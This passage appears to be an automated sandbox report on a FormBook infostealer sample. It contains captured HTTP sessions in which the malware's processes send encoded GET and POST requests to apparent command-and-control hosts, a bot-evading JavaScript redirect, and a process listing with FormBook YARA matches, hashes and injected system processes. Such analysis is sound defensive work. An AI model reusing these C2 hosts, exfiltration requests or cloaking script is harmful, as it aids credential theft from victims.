oQ2ZV6ae3LgR+Lu2QLCY5shJCiOMo1lYVOodAzhzQTCw89eZ340o90WNnV+db26ik9VMdmoIJeNRF4WtKWN+fcd6gZCXjRg+m7dJVB3UH+T74e78YM5BsDzGte5 [TRUNCATED]
Jan 10, 2025 20:10:15.224539995 CET	729	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Address: gin_throttle_mw_7200000000_8.46.123.189 X-Ratelimit-Limit: 500 X-Ratelimit-Remaining: 497 X-Ratelimit-Reset: 1736539810 Date: Fri, 10 Jan 2025 19:10:15 GMT Content-Length: 458 Connection: close Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED] Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49991	45.158.77.253	80	6688	C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:10:17.122510910 CET	372	OUT	GET /o5i7/?bxDtSjJ8=UzQqnnXvSc3Mr+9QcvCsHMvIJtyRJ1aQrLi0DBTwMAPqBtFAVrqfkCNp/R9/sDvSPASnyWuFHZLa9XQnO8xSKQTT8XEJ9CJbgwDafhDT3FMBtYtvONQCjms9TNvshXbs6vmRQiM=&zj=orBTgZEhYzzl76 HTTP/1.1 Host: www.moritynomxd.xyz Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)
Jan 10, 2025 20:10:17.773442030 CET	729	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 X-Address: gin_throttle_mw_7200000000_8.46.123.189 X-Ratelimit-Limit: 500 X-Ratelimit-Remaining: 496 X-Ratelimit-Reset: 1736539810 Date: Fri, 10 Jan 2025 19:10:17 GMT Content-Length: 458 Connection: close Data Raw: 3c 73 63 72 69 70 74 3e 0a 6c 65 74 20 65 3d 6e 65 77 20 55 52 4c 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 65 2e 70 61 74 68 6e 61 6d 65 3d 22 2f 74 22 2b 65 2e 70 61 74 68 6e 61 6d 65 3b 6c 65 74 20 6f 3d 65 2e 74 6f 53 74 72 69 6e 67 28 29 3b 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 26 26 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 6f 3d 5b 22 67 6f 6f 67 6c 65 62 6f 74 22 2c 22 62 69 6e 67 62 6f 74 22 2c 22 79 61 6e 64 65 78 62 6f 74 22 2c 22 64 75 63 6b 64 75 63 6b 62 6f 74 22 2c 22 73 6c 75 72 70 22 2c 22 62 61 69 64 75 73 70 69 64 65 72 22 2c 22 66 61 63 65 62 6f 74 22 2c 22 69 61 5f 61 72 63 68 69 76 65 72 22 5d 2c 74 3d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 6e 3d 30 3b 6e 3c 6f 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 74 2e 69 6e 64 65 78 4f 66 28 6f 5b 6e 5d 29 3e 2d 31 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 3f 73 65 74 54 [TRUNCATED] Data Ascii: <script>let e=new URL(window.location.href);e.pathname="/t"+e.pathname;let o=e.toString();navigator.cookieEnabled&&!function(e){for(var o=["googlebot","bingbot","yandexbot","duckduckbot","slurp","baiduspider","facebot","ia_archiver"],t=e.toLowerCase(),n=0;n<o.length;n++)if(t.indexOf(o[n])>-1)return!0;return!1}(navigator.userAgent)?setTimeout((function(){document.location.href=o}),1e3):console.log("bt");</script><p style="color:gray;">redirect...</p>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49992	156.242.132.82	80	6688	C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:10:23.148283958 CET	632	OUT	POST /pjwm/ HTTP/1.1 Host: www.shanhaiguan.net Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.shanhaiguan.net Referer: http://www.shanhaiguan.net/pjwm/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 213 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS) Data Raw: 62 78 44 74 53 6a 4a 38 3d 78 66 6d 56 5a 2b 4c 74 6b 73 6c 56 53 50 65 36 73 6c 7a 61 57 72 38 62 54 78 48 2b 73 2f 63 36 37 4c 57 49 79 47 4b 57 74 2b 70 44 70 35 62 51 36 53 76 2f 4b 6f 32 30 75 72 74 6e 77 6f 56 78 74 35 30 47 62 58 45 50 76 66 56 73 43 69 55 56 55 31 38 6a 30 43 2b 6a 36 2f 57 53 62 70 4f 6a 4e 72 69 35 68 6c 4c 73 4b 36 63 34 39 64 7a 33 51 50 56 2f 2b 50 6f 69 56 49 6c 7a 7a 53 33 7a 2b 44 64 42 75 76 4a 49 4f 37 47 35 45 77 72 77 41 4c 43 6a 32 57 54 66 56 47 4a 4d 49 6e 31 70 73 44 36 31 34 77 41 67 41 46 37 79 33 6f 6c 7a 6d 71 36 5a 64 59 39 49 42 72 33 32 78 4a 48 56 76 35 61 5a 35 39 4f 67 69 35 52 33 Data Ascii: bxDtSjJ8=xfmVZ+LtkslVSPe6slzaWr8bTxH+s/c67LWIyGKWt+pDp5bQ6Sv/Ko20urtnwoVxt50GbXEPvfVsCiUVU18j0C+j6/WSbpOjNri5hlLsK6c49dz3QPV/+PoiVIlzzS3z+DdBuvJIO7G5EwrwALCj2WTfVGJMIn1psD614wAgAF7y3olzmq6ZdY9IBr32xJHVv5aZ59Ogi5R3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49993	156.242.132.82	80	6688	C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:10:25.693370104 CET	656	OUT	POST /pjwm/ HTTP/1.1 Host: www.shanhaiguan.net Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.shanhaiguan.net Referer: http://www.shanhaiguan.net/pjwm/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 237 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS) Data Raw: 62 78 44 74 53 6a 4a 38 3d 78 66 6d 56 5a 2b 4c 74 6b 73 6c 56 54 76 75 36 72 43 66 61 58 4c 38 59 57 78 48 2b 6d 66 63 32 37 4c 61 49 79 48 4f 47 73 4e 64 44 6f 59 72 51 6f 41 48 2f 45 49 32 30 38 4c 74 6d 36 49 56 4d 74 35 34 30 62 53 6b 50 76 66 52 73 43 6e 77 56 55 44 30 69 31 53 2b 68 68 76 57 4d 44 4a 4f 6a 4e 72 69 35 68 68 6e 53 4b 36 45 34 38 74 6a 33 52 75 56 38 68 2f 6f 74 44 59 6c 7a 69 69 33 33 2b 44 64 2f 75 75 6c 79 4f 39 43 35 45 78 62 77 41 5a 6d 67 38 57 54 6a 5a 57 49 4d 47 79 49 31 6d 44 54 77 2f 54 45 42 51 56 54 65 2f 2b 6b 70 36 5a 36 36 50 49 64 4b 42 70 76 45 78 70 48 2f 74 35 69 5a 72 71 43 48 74 4e 30 55 54 56 45 46 2f 6f 6a 62 68 48 43 48 5a 52 4f 37 2f 72 6d 6c 4e 51 3d 3d Data Ascii: bxDtSjJ8=xfmVZ+LtkslVTvu6rCfaXL8YWxH+mfc27LaIyHOGsNdDoYrQoAH/EI208Ltm6IVMt540bSkPvfRsCnwVUD0i1S+hhvWMDJOjNri5hhnSK6E48tj3RuV8h/otDYlzii33+Dd/uulyO9C5ExbwAZmg8WTjZWIMGyI1mDTw/TEBQVTe/+kp6Z66PIdKBpvExpH/t5iZrqCHtN0UTVEF/ojbhHCHZRO7/rmlNQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49995	156.242.132.82	80	6688	C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:10:28.236723900 CET	1669	OUT	POST /pjwm/ HTTP/1.1 Host: www.shanhaiguan.net Accept: / Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.shanhaiguan.net Referer: http://www.shanhaiguan.net/pjwm/ Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1249 Cache-Control: no-cache User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS) Data Raw: 62 78 44 74 53 6a 4a 38 3d 78 66 6d 56 5a 2b 4c 74 6b 73 6c 56 54 76 75 36 72 43 66 61 58 4c 38 59 57 78 48 2b 6d 66 63 32 37 4c 61 49 79 48 4f 47 73 4e 46 44 70 71 6a 51 36 32 50 2f 48 49 32 30 2f 4c 74 72 36 49 56 64 74 35 68 2f 62 53 70 36 76 63 35 73 44 42 38 56 46 52 63 69 2f 53 2b 68 2b 2f 57 52 62 70 4f 54 4e 72 79 39 68 6c 48 53 4b 36 45 34 38 72 50 33 57 2f 56 38 6e 2f 6f 69 56 49 6c 33 7a 53 33 66 2b 41 73 45 75 75 52 69 4f 4e 69 35 46 52 4c 77 43 71 43 67 36 47 54 62 59 6d 49 69 47 79 4d 63 6d 46 33 57 2f 51 59 37 51 53 6a 65 75 61 6c 2b 70 34 62 67 51 4c 4a 77 63 70 76 79 32 75 7a 44 74 4a 6d 75 6a 4a 4f 50 6d 2f 41 36 59 41 6c 64 30 34 6d 38 6a 58 79 6d 57 48 75 72 72 72 33 58 66 66 59 32 70 4c 79 64 41 43 69 32 66 76 78 39 30 34 55 71 38 51 77 38 78 41 69 65 62 44 35 38 56 4f 53 6c 5a 49 48 4f 6d 35 76 7a 55 6c 4f 72 73 32 78 4e 53 6c 75 6f 2b 63 61 4b 36 6b 49 63 46 41 58 6c 64 57 70 4c 51 74 70 7a 74 79 67 71 48 70 6b 34 56 44 79 59 52 50 2f 4d 71 62 44 32 33 64 41 39 39 4e 35 6e 52 [TRUNCATED] Data Ascii: bxDtSjJ8=xfmVZ+LtkslVTvu6rCfaXL8YWxH+mfc27LaIyHOGsNFDpqjQ62P/HI20/Ltr6IVdt5h/bSp6vc5sDB8VFRci/S+h+/WRbpOTNry9hlHSK6E48rP3W/V8n/oiVIl3zS3f+AsEuuRiONi5FRLwCqCg6GTbYmIiGyMcmF3W/QY7QSjeual+p4bgQLJwcpvy2uzDtJmujJOPm/A6YAld04m8jXymWHurrr3XffY2pLydACi2fvx904Uq8Qw8xAiebD58VOSlZIHOm5vzUlOrs2xNSluo+caK6kIcFAXldWpLQtpztygqHpk4VDyYRP/MqbD23dA99N5nRga/TjvWi+uMY1y45phSekJGXvHdWHHYVfLPUueJqtKH0dvQkmoXgJSIA8A7mozqqCBrQurE3WeU3Xz4klSzDV+sjhxpMMHx2mFEwkbyi838M4tokAgTnKUYIaY0DUzFbj4/PTou5WlpmtMIEs1KHDZissSFr431vCZ2kFklRLq0n9Zd0kOVRbB3y0W4xC35hfciE2a6Z/DJ+XgHmRhC75uX9ZfJiBBPqR9EYBHq4IpreZI2o2KREjK7hb13EgwUBiQQqkclMuBgbxzgbw5+DzoW7J50fbv++++M2WCcFnSf4OG9pZLYz+5tvbN3hkYeWn2rJoVib2p0IhWCoB/cZKqOCH0UYdsgzZebnhEjs+kmxCGqkZwdjKafm9xNfV2EQwK5Gw7QBMymIDaoL8qgHvQ5ScMdVsK76ZpvqMyGRmkxhOabmNkNO7OCkOFgPyUhcxDWDDfzBicgx5BzESiHAAe+RQUsSkrP89XYqC/lMMO4nQqlr3KMh6jfcaZTCiCmAb02xgpwCHXYZU1ox1EEr81+0cEE1av2Q8QnbK7U8noPUwISaHazLGYF/y4i9IvHQCttSHUKaXH76fZ/yqp4bx9ESgrn65xG+9siT0IeRzI4zV7jMt397rSPPsGNB3oMm6eZ6XktcHWAzFm3tWvRgaS0bwVEy5T0Y30 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49996	156.242.132.82	80	6688	C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 20:10:30.781498909 CET	372	OUT	GET /pjwm/?bxDtSjJ8=8dO1aKrXjPlkXvyCnyLGa4pnRyHZl/5Glqi2qmOCi9JNoYrB/H/4K5GJx7Vk3aBG8ot0fyIE2s8PLQIeBQda8ynm0peoT5yaFK2JmAGmcsEs6JHRTdV3uPo4ApQ0nSHi8A1Y4Yw=&zj=orBTgZEhYzzl76 HTTP/1.1 Host: www.shanhaiguan.net Accept: / Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; MAARJS)

Target ID:	0
Start time:	14:08:48
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\psibx9rXra.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\psibx9rXra.exe"
Imagebase:	0xf80000
File size:	1'365'504 bytes
MD5 hash:	DF44B0A1B0208D51EE82419A7C9FDF47
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	2
Start time:	14:08:49
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\psibx9rXra.exe"
Imagebase:	0xee0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2535902466.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2535902466.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2536228710.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2536228710.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2536655020.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2536655020.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	14:09:12
Start date:	10/01/2025
Path:	C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe"
Imagebase:	0x8c0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3456190580.00000000039A0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.3456190580.00000000039A0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Target ID:	5
Start time:	14:09:13
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\newdev.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\newdev.exe"
Imagebase:	0x330000
File size:	67'584 bytes
MD5 hash:	4C2EACBE19E43DCEC83534AE1A8738B8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3455881831.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3455881831.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3455791423.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3455791423.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3446776007.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.3446776007.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Target ID:	7
Start time:	14:09:33
Start date:	10/01/2025
Path:	C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe"
Imagebase:	0x8c0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3457739749.0000000005530000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3457739749.0000000005530000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Target ID:	9
Start time:	14:09:45
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true